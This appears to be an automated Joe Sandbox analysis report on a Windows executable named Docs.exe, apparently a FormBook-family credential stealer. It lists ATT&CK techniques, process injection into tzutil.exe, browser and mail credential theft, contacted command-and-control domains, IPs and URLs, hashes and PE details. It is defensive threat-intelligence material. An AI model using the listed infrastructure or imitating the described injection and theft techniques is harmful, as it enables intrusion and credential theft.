                      DLL Side-Loading                      		41
                      Virtualization/Sandbox Evasion                      		Security Account Manager41
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares1
                      Data from Local System                      		4
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture4
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                      Deobfuscate/Decode Files or Information                      		LSA Secrets2
                      File and Directory Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Abuse Elevation Control Mechanism                      		Cached Domain Credentials113
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                      Obfuscated Files or Information                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                      Software Packing                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Timestomp                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      DLL Side-Loading                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1564721 Sample: Docs.exe Startdate: 28/11/2024 Architecture: WINDOWS Score: 100 30 www.070001325.xyz 2->30 32 www.learnwithus.site 2->32 34 4 other IPs or domains 2->34 44 Suricata IDS alerts for network traffic 2->44 46 Antivirus detection for URL or domain 2->46 48 Multi AV Scanner detection for submitted file 2->48 52 7 other signatures 2->52 10 Docs.exe 3 2->10         started        signatures3 50 Performs DNS queries to domains with low reputation 30->50 process4 file5 28 C:\Users\user\AppData\Local\...\Docs.exe.log, ASCII 10->28 dropped 13 Docs.exe 10->13         started        process6 signatures7 64 Maps a DLL or memory area into another process 13->64 16 hrhhgLQrQIpiVv.exe 13->16 injected process8 signatures9 42 Found direct / indirect Syscall (likely to bypass EDR) 16->42 19 tzutil.exe 13 16->19         started        process10 signatures11 54 Tries to steal Mail credentials (via file / registry access) 19->54 56 Tries to harvest and steal browser information (history, passwords, etc) 19->56 58 Modifies the context of a thread in another process (thread injection) 19->58 60 3 other signatures 19->60 22 hrhhgLQrQIpiVv.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 36 www.expancz.top 107.155.56.30, 49736, 49737, 49738 UHGL-AS-APUCloudHKHoldingsGroupLimitedHK United States 22->36 38 www.070001325.xyz 161.97.142.144, 49735, 80 CONTABODE United States 22->38 40 dns.ladipage.com 18.139.62.226, 49740, 49741, 49742 AMAZON-02US United States 22->40 62 Found direct / indirect Syscall (likely to bypass EDR) 22->62 signatures14

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Docs.exe37%ReversingLabsByteCode-MSIL.Trojan.Genie8DN
                      Docs.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.taxiquynhonnew.click0%Avira URL Cloudsafe
                      http://www.taxiquynhonnew.click/y49d/?rvEtL=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMbHvD8EqtoJ5XtYi/VJ05VR664cQpqJJXFZbebi2oU1EEMw==&mFTD=mPHXHp100%Avira URL Cloudmalware
                      http://www.070001325.xyz/gebt/?rvEtL=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edh05neJJauEoNaZQG1y+cvjoSHU7S86EKf7lUg55fOkggqQ==&mFTD=mPHXHp0%Avira URL Cloudsafe
                      http://www.taxiquynhonnew.click/y49d/100%Avira URL Cloudmalware
                      https://www.taxiquynhonnew.click/y49d/?rvEtL=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkM100%Avira URL Cloudmalware
                      https://dq0ib5xlct7tw.cloudfront.net/0%Avira URL Cloudsafe
                      https://l3filejson4dvd.josyliving.com/favicon.ico0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.expancz.top
                      		107.155.56.30
                      		truetrue
                        		unknown
                        www.learnwithus.site
                        		209.74.77.107
                        		truetrue
                          		unknown
                          dns.ladipage.com
                          		18.139.62.226
                          		truefalse
                            		high
                            www.070001325.xyz
                            		161.97.142.144
                            		truetrue
                              		unknown
                              www.epitomize.shop
                              		unknown
                              		unknownfalse
                                		unknown
                                www.taxiquynhonnew.click
                                		unknown
                                		unknownfalse
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.taxiquynhonnew.click/y49d/true
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.070001325.xyz/gebt/?rvEtL=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edh05neJJauEoNaZQG1y+cvjoSHU7S86EKf7lUg55fOkggqQ==&mFTD=mPHXHptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.taxiquynhonnew.click/y49d/?rvEtL=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMbHvD8EqtoJ5XtYi/VJ05VR664cQpqJJXFZbebi2oU1EEMw==&mFTD=mPHXHptrue
                                  • Avira URL Cloud: malware
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://ac.ecosia.org/autocomplete?q=tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/chrome_newtabtzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://l3filejson4dvd.josyliving.com/favicon.icotzutil.exe, 00000007.00000002.3290025914.00000000045D6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000007.00000002.3291655096.0000000006810000.00000004.00000800.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://duckduckgo.com/ac/?q=tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icotzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://connect.facebook.net/en_US/fbevents.jstzutil.exe, 00000007.00000002.3290025914.00000000045D6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000007.00000002.3291655096.0000000006810000.00000004.00000800.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmpfalse
                                            		high
                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://s.yimg.com/wi/ytc.jstzutil.exe, 00000007.00000002.3290025914.00000000045D6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000007.00000002.3291655096.0000000006810000.00000004.00000800.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://analytics.tiktok.com/i18n/pixel/events.jstzutil.exe, 00000007.00000002.3290025914.00000000045D6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000007.00000002.3291655096.0000000006810000.00000004.00000800.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://dq0ib5xlct7tw.cloudfront.net/hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.ecosia.org/newtab/tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.taxiquynhonnew.clickhrhhgLQrQIpiVv.exe, 00000008.00000002.3288549550.0000000000E4D000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://login.livetzutil.exe, 00000007.00000002.3288094917.000000000352F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.taxiquynhonnew.click/y49d/?rvEtL=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMtzutil.exe, 00000007.00000002.3290025914.0000000004768000.00000004.10000000.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.00000000034A8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            161.97.142.144
                                                            		www.070001325.xyzUnited States
                                                            		51167CONTABODEtrue
                                                            18.139.62.226
                                                            		dns.ladipage.comUnited States
                                                            		16509AMAZON-02USfalse
                                                            107.155.56.30
                                                            		www.expancz.topUnited States
                                                            		135377UHGL-AS-APUCloudHKHoldingsGroupLimitedHKtrue

                                                            General Information

                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1564721
                                                            Start date and time:2024-11-28 18:27:38 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 8m 51s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:8
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:2
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:Docs.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@7/2@6/3
                                                            EGA Information:
                                                            • Successful, ratio: 75%
                                                            HCA Information:
                                                            • Successful, ratio: 96%
                                                            • Number of executed functions: 106
                                                            • Number of non-executed functions: 299
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target hrhhgLQrQIpiVv.exe, PID 1856 because it is empty
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • VT rate limit hit for: Docs.exe

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            12:28:27API Interceptor2x Sleep call for process: Docs.exe modified
                                                            12:29:59API Interceptor256935x Sleep call for process: tzutil.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            161.97.142.144Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.030002449.xyz/cfqm/
                                                            PAYMENT_TO_NFTC_(CUB)_26-11-24.docGet hashmaliciousDarkTortilla, FormBookBrowse
                                                            • www.070001955.xyz/7zj0/
                                                            W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.54248711.xyz/jm2l/
                                                            IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.030002613.xyz/xd9h/
                                                            Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                            • www.070002018.xyz/6m2n/
                                                            PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                            • www.54248711.xyz/jm2l/
                                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                                            • www.54248711.xyz/jm2l/
                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                            • www.54248711.xyz/jm2l/
                                                            Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • www.070002018.xyz/zffa/
                                                            DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                            • www.030003794.xyz/mpp6/
                                                            18.139.62.226COMMERCIAL-DOKUMEN-YANG-DIREVISI.exeGet hashmaliciousFormBookBrowse
                                                            • www.sonixinept.shop/zgr2/
                                                            Amended Proforma #U2013 SMWD5043.exeGet hashmaliciousFormBookBrowse
                                                            • www.tmstore.click/ih4w/
                                                            PO098765678.exeGet hashmaliciousFormBookBrowse
                                                            • www.tmstore.click/ih4w/
                                                            SHIPPING DOC MBL+HBL.exeGet hashmaliciousFormBookBrowse
                                                            • www.masteriocp.online/p5rq/
                                                            3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                                                            • www.masteriocp.online/p5rq/
                                                            Scan 00093847.exeGet hashmaliciousFormBookBrowse
                                                            • www.masteriocp.online/wg84/
                                                            DN.exeGet hashmaliciousFormBookBrowse
                                                            • www.masteriocp.online/p5rq/
                                                            DHL_497104778908.exeGet hashmaliciousFormBookBrowse
                                                            • www.gaolibai.site/dk07/?hJ=D8pto4BPuzWD9&BZy=GDy9Ivf9UNaqrv9frjLto9uu2IkJerzBBeACnqJs3sHtDRLx3rmxpepnBsqEQrJHpKMtcSrveA==
                                                            Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                            • www.againbeautywhiteskin.asia/3h10/
                                                            SecuriteInfo.com.Win32.PWSX-gen.5935.26892.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.hisako.store/e368/

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            www.learnwithus.siteOUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.107
                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.107
                                                            RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.107
                                                            dns.ladipage.comXFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 13.228.81.39
                                                            Swift copy.exeGet hashmaliciousFormBookBrowse
                                                            • 18.139.62.226
                                                            wavjjT3sEq.exeGet hashmaliciousFormBookBrowse
                                                            • 54.179.173.60
                                                            COMMERCIAL-DOKUMEN-YANG-DIREVISI.exeGet hashmaliciousFormBookBrowse
                                                            • 18.139.62.226
                                                            Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 54.179.173.60
                                                            7v8szLCQAn.exeGet hashmaliciousFormBookBrowse
                                                            • 54.179.173.60
                                                            Amended Proforma #U2013 SMWD5043.exeGet hashmaliciousFormBookBrowse
                                                            • 18.139.62.226
                                                            AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                            • 54.179.173.60
                                                            2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                                                            • 54.179.173.60
                                                            ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                            • 54.179.173.60
                                                            www.expancz.topXFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 107.155.56.30
                                                            Swift copy.exeGet hashmaliciousFormBookBrowse
                                                            • 107.155.56.30
                                                            www.070001325.xyzXFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 161.97.142.144
                                                            Swift copy.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            AMAZON-02USt1gY0BGmOZ.jarGet hashmaliciousCan StealerBrowse
                                                            • 45.112.123.126
                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                            • 18.244.18.27
                                                            https://share.fremontpeak.org/___.YzJ1OmNvZ2l3ZWIyOmM6bzpiNTEyZDAxNmZiN2I1MjU1MmE3OTQzOTdiZmE2NWEzZjo3OmQ0ZjU6ZDQ4OTQ1MWM1NjM2NzgxOWI0N2UyODgzNmYwYzIzOTkxYjZmOTA5ZjUyY2M5MTJiN2UzZTBiMmYwOTQ5NzhhNTpoOlQ6TgGet hashmaliciousUnknownBrowse
                                                            • 76.76.21.98
                                                            loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                            • 79.125.17.155
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 54.67.42.145
                                                            x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 18.175.16.150
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 54.67.42.145
                                                            mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 13.232.161.249
                                                            http://englobe.infralogin.com/passresetconfirm/ODA0MDY/6qb-fdbad004345ade5cc1bb/Get hashmaliciousUnknownBrowse
                                                            • 13.32.121.32
                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                            • 3.171.139.124
                                                            UHGL-AS-APUCloudHKHoldingsGroupLimitedHKnabppc.elfGet hashmaliciousUnknownBrowse
                                                            • 107.155.48.54
                                                            shell64.elfGet hashmaliciousConnectBackBrowse
                                                            • 45.43.36.223
                                                            XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 107.155.56.30
                                                            Swift copy.exeGet hashmaliciousFormBookBrowse
                                                            • 107.155.56.30
                                                            SecuriteInfo.com.Trojan.GenericKD.72343208.3006.1077.exeGet hashmaliciousUnknownBrowse
                                                            • 152.32.197.201
                                                            SecuriteInfo.com.Trojan.GenericKD.72343208.3006.1077.exeGet hashmaliciousUnknownBrowse
                                                            • 152.32.197.201
                                                            https://rwy.xpbf130.vip/Get hashmaliciousUnknownBrowse
                                                            • 101.36.121.234
                                                            http://cmn.ftft155.vip/Get hashmaliciousUnknownBrowse
                                                            • 101.36.121.234
                                                            http://cmn.xfor965.vip/Get hashmaliciousUnknownBrowse
                                                            • 101.36.121.234
                                                            http://cmn.pkgu192.vip/Get hashmaliciousUnknownBrowse
                                                            • 101.36.121.234
                                                            CONTABODEOUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.168.245
                                                            Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 161.97.142.144
                                                            ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 161.97.168.245
                                                            PAYMENT_TO_NFTC_(CUB)_26-11-24.docGet hashmaliciousDarkTortilla, FormBookBrowse
                                                            • 161.97.142.144
                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.168.245
                                                            sh4.elfGet hashmaliciousMiraiBrowse
                                                            • 95.212.120.217
                                                            W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 161.97.142.144
                                                            REQUESTING FOR UPDATED SOA.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.168.245
                                                            XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 161.97.142.144
                                                            IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 161.97.142.144

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Docs.exe.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Docs.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                            C:\Users\user\AppData\Local\Temp\UQ63g7r-

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\tzutil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.808815075532386
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Windows Screen Saver (13104/52) 0.07%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            File name:Docs.exe
                                                            File size:799'232 bytes
                                                            MD5:db3260038649d2048d4d203b210c42ad
                                                            SHA1:5057a1fd64ddcf3ecc104558972db366a062f6ca
                                                            SHA256:a0d68da288f42150fd44bda2ead2c51e139e25b518a932e8071818af802107b3
                                                            SHA512:230914c5e5fa7dbd91fd1727faa20b1b4078ea9f9c0b3db81476f6395f549619cafff4ae18186809d2d13d32665d6130705bfd867c41239aeccb20ea83dd8378
                                                            SSDEEP:24576:D/bVylX8rJ03tctF4puBKgQqhF2So/e01zGUxjP:ly0mctF4kzxo/RLJ
                                                            TLSH:8A0512841966E902C9E28B740572D2F417794D9DEE12C303DFEA7DFF7A3E20935802A4
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O.................0..(...........F... ...`....@.. ....................................@................................

                                                            File Icon

                                                            Icon Hash:00928e8e8686b000

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x4c46de
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x8293E54F [Fri Jun 3 16:16:15 2039 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
